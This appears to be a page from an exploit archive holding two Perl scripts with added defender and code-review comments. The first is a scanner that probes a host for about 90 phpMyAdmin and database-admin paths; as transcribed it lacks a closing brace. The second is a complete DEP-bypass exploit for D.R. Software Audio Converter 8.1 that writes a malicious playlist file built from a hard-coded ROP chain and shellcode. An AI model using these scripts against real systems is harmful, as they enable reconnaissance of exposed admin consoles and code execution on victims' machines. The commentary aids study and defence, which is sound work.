Yakamoz phpMyAdmin Finder
06.12PHP
#!/usr/bin/perl
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
#
# ////////////////////////////////////
# Yakamoz PHPmyadmin Finder v.x.x
# ////////////////////////////////////
#
# Title    : PHPmyadmin Finder
# Author   : Bl4ck.Viper
# From     : Azarbycan
# Category : Remote
# Emails   : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
#
# What this script does: reads one host from STDIN, prefixes "http://" when
# the input has no "http://" in it, then issues a GET for every entry of @p
# (well-known phpMyAdmin / database-admin directory names) and prints a
# "Found" or "NotFound" line per path.
#
# Notes for defenders / log reviewers:
#   - Each run produces ~90 GET requests in quick succession from a single
#     client to the paths listed in @p, using LWP::UserAgent's default
#     User-Agent (no custom header is set here). That burst is easy to spot
#     in web-server access logs and to rate-limit at the edge.
#   - The usual mitigations apply: do not expose database admin consoles on
#     the public interface at guessable paths, put them behind
#     authentication / IP allow-listing, and keep phpMyAdmin current.
#
# Review notes on the code itself (left byte-identical below):
#   - No `use strict; use warnings;`; every variable is a package global.
#   - `system("cls")` / `system("title ...")` are Windows cmd.exe built-ins;
#     on other platforms they simply fail and are not checked.
#   - The host check only looks for "http://", so an "https://..." input is
#     turned into "http://https://...".
#   - The `else` belongs only to the "Access Denied" test that precedes it,
#     so a path that returned success prints both "Found" and "NotFound".
#   - The closing brace of the foreach block is missing as transcribed on
#     the page, so the script does not parse as shown.

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
system ("title Bl4ck.Viper (Yakamoz)...");

print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t PHPmyadmin Finder v.x.x\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\n\n";

# Target host is read interactively; no validation beyond the scheme prefix.
print "\t HOST=> (ex: http://www.site.com)\n";
print "\t HOST=> :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n";
print "\n\n";

# Candidate directories to probe. The list contains duplicates
# ("/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.3/"), so those paths are
# requested twice.
@p = ("/phpMyAdmin/", "/phpmyadmin/", "/PMA/", "/admin/", "/dbadmin/", "/mysql/", "/myadmin/", "/phpmyadmin2/", "/phpMyAdmin2/", "/phpMyAdmin-2/", "/php-my-admin/", "/phpMyAdmin-2.2.3/", "/phpMyAdmin-2.2.6/", "/phpMyAdmin-2.5.1/", "/phpMyAdmin-2.5.4/", "/phpMyAdmin-2.5.5-rc1/", "/phpMyAdmin-2.5.5-rc2/", "/phpMyAdmin-2.5.5/", "/phpMyAdmin-2.5.5-pl1/", "/phpMyAdmin-2.5.6-rc1/", "/phpMyAdmin-2.5.6-rc2/", "/phpMyAdmin-2.5.6/", "/phpMyAdmin-2.5.7/", "/phpMyAdmin-2.5.7-pl1/", "/phpMyAdmin-2.6.0-alpha/", "/phpMyAdmin-2.6.0-alpha2/", "/phpMyAdmin-2.6.0-beta1/", "/phpMyAdmin-2.6.0-beta2/", "/phpMyAdmin-2.6.0-rc1/", "/phpMyAdmin-2.6.0-rc2/", "/phpMyAdmin-2.6.0-rc3/", "/phpMyAdmin-2.6.0/", "/phpMyAdmin-2.6.0-pl1/", "/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/", "/phpMyAdmin-2.6.1-rc1/", "/phpMyAdmin-2.6.1-rc2/", "/phpMyAdmin-2.6.1/", "/phpMyAdmin-2.6.1-pl1/", "/phpMyAdmin-2.6.1-pl2/", "/phpMyAdmin-2.6.1-pl3/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2-beta1/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2/", "/phpMyAdmin-2.6.2-pl1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-rc1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-pl1/", "/phpMyAdmin-2.6.4-rc1/", "/phpMyAdmin-2.6.4-pl1/", "/phpMyAdmin-2.6.4-pl2/", "/phpMyAdmin-2.6.4-pl3/", "/phpMyAdmin-2.6.4-pl4/", "/phpMyAdmin-2.6.4/", "/phpMyAdmin-2.7.0-beta1/", "/phpMyAdmin-2.7.0-rc1/", "/phpMyAdmin-2.7.0-pl1/", "/phpMyAdmin-2.7.0-pl2/", "/phpMyAdmin-2.7.0/", "/phpMyAdmin-2.8.0-beta1/", "/phpMyAdmin-2.8.0-rc1/", "/phpMyAdmin-2.8.0-rc2/", "/phpMyAdmin-2.8.0/", "/phpMyAdmin-2.8.0.1/", "/phpMyAdmin-2.8.0.2/", "/phpMyAdmin-2.8.0.3/", "/phpMyAdmin-2.8.0.4/", "/phpMyAdmin-2.8.1-rc1/", "/phpMyAdmin-2.8.1/", "/phpMyAdmin-2.8.2/", "/sqlmanager/", "/mysqlmanager/", "/p/m/a/", "/PMA2005/", "/pma2005/", "/phpmanager/", "/php-myadmin/", "/phpmy-admin/", "/webadmin/", "/sqlweb/", "/websql/", "/webdb/", "/mysqladmin/", "/mysql-admin/");

# One synchronous GET per path; a new UserAgent is built on every iteration.
foreach $myadmin(@p){
    $url = $host.$myadmin;
    $request = HTTP::Request->new(GET=>$url);
    $useragent = LWP::UserAgent->new();
    $response = $useragent->request($request);
    if ($response->is_success){print "Found : $url\n";}
    # NOTE(review): the `else` below pairs with this `if` only, so a
    # successful response above still falls through to "NotFound".
    if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";}
    else {print "NotFound : $myadmin\n";}
# NOTE(review): closing `}` of the foreach is absent in the transcription.

# Source : http://www.exploit-id.com/
D.R. Software Audio Converter 8.1 DEP Bypass Exploit
06.08
WINDOWS
#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 13\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
# What this script does: it builds a 30000-byte buffer in memory and writes
# it to a file named "Exploit.pls" in the current directory. The buffer is
# padding plus a chain of hard-coded 32-bit addresses (the "ROP" sections
# below) followed by a payload the author's comment describes as launching
# calc.exe. Nothing is sent over the network; the file has to be opened by
# the vulnerable converter for anything to happen.
#
# Notes for defenders:
#   - The proof-of-concept artefact is a .pls playlist file of exactly
#     30000 bytes, mostly filler ("A", "C", "D" runs). Oversized playlist
#     files from untrusted sources are the thing to treat with suspicion,
#     and the affected product version is named in the header above.
#   - Every gadget address is a fixed constant (pack('V', 0x...)), so the
#     chain presumably relies on the involved modules loading at the same
#     base every time; mandatory ASLR for the process would likely break it
#     (not verifiable from this file alone).
#   - "Tested On" is a single OS/language build; behaviour elsewhere is not
#     established by this page.
#
# Review notes on the code itself (left byte-identical below):
#   - No `use strict; use warnings;` (the `my` declarations are there, but
#     nothing enforces them).
#   - `open(f, ">Exploit.pls")` is a two-argument open with a bareword
#     filehandle; `close f` is unchecked, so a short write would go unnoticed.
#   - Comments originally in Portuguese are translated to English in place.

print q{ Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com Site net-fuzzer.blogspot.com };
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);

#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',0x0044B274);   # Address of LoadLibraryA
$rop .= pack('V',0x1003d56e);   # POP ESI # RETN
$rop .= pack('V',0x10055FBD);   # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA
$rop .= pack('V',0x10068022);   # POP EBP # RETN
$rop .= pack('V',0x1003AA1A);   # ADD ESP,28 # RETN 04
$rop .= pack('V',0x0040aaf2);   # POP EDI # RETN
$rop .= pack('V',0x1002ef15);   #RETN
$rop .= pack('V',0x1002ef14);   # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 11;
#####################################ROP END HERE#######################################

#####################################ROP FOR GetProcAddress#############################
$rop .= pack('V',0x1002ef15) x 3; #RETN
$rop .= pack('V',0x00430076);   # POP ECX # RETN
$rop .= pack('V',0x0044B1E8);   # Address of GetProcAddress
$rop .= pack('V',0x0040aaf2);   # POP EDI # RETN
$rop .= pack('V',0x10055FBD);   # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress
$rop .= pack('V',0x1006809f);   # POP ESI # RETN
$rop .= pack('V',0x1003AA1A);   # ADD ESP,28 # RETN 04
$rop .= pack('V',0x00447b7d);   # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1002ef14);   # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "D" x 9;                # Junk
#####################################ROP END HERE#######################################

################################ROP FOR VirtualProtect##################################
$rop .= pack('V',0x1002ef15) x 4; #RETN
$rop .= pack('V',0x10037d05);   # XCHG EAX,ESI # RETN
$rop .= pack('V',0x100753c0);   # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN
$rop .= "A" x 20;               # Junk
$rop .= pack('V',0x10015a15);   # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1004108e) x 20; # ADD EAX,0A # RETN
$rop .= pack('V',0x1007275D);   # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
$rop .= "A" x 4;
$rop .= pack('V',0x1002ef15) x 5; #RETN
$rop .= pack('V',0x10037d05);   # XCHG EAX,ESI # RETN
$rop .= pack('V',0x10068022);   # POP EBP # RETN
$rop .= pack('V',0x0040A8F4);   # CALL ESP // return address of the function
$rop .= pack('V',0x100080ea);   # POP EBX # RETN
$rop .= pack('V',0x00001000);   # dwSize value
$rop .= pack('V',0x10082cde);   # POP EDX # RETN
$rop .= pack('V',0x00000040);   # flNewProtect value
$rop .= pack('V',0x1007076e);   # POP EDI # RETN
$rop .= pack('V',0x1002ef15);   # RETN
$rop .= pack('V',0x1002ef14);   # PUSHAD # RETN
$rop .= "\x90" x 25;            # Some nops
$rop .= "\xeb\x10";             # Little jmp to fix shellcode. :)
$rop .= "\x90" x 20;            # More nops
####################################ROP END HERE#####################################

my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

# Assemble the file contents: fixed-size padding runs with the address
# chain and payload embedded, then filler to exactly 30000 bytes.
my $buf = "A" x 180;
$buf .= pack('V',0x1001bc95);   # ADD ESP,1010 # RETN 04
$buf .= "A" x 4112;
$buf .= pack('V',0x10071916) x 2; # RETN
$buf .= pack('V',0x10071910);   # ADD ESP,100 # RETN
$buf .= "C" x (4436-length($buf));
$buf .= pack('V',0x10029cfd);   # ADD ESP,814 # RETN
$buf .= "A" x 124;
$buf .= $rop;
$buf .= $shellcode;
$buf .= "D" x (30000-length($buf));

# Two-arg open on a bareword handle; only the open is error-checked.
open(f,">Exploit.pls") or die "[*]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.pls Created successfully.\n";
sleep(1);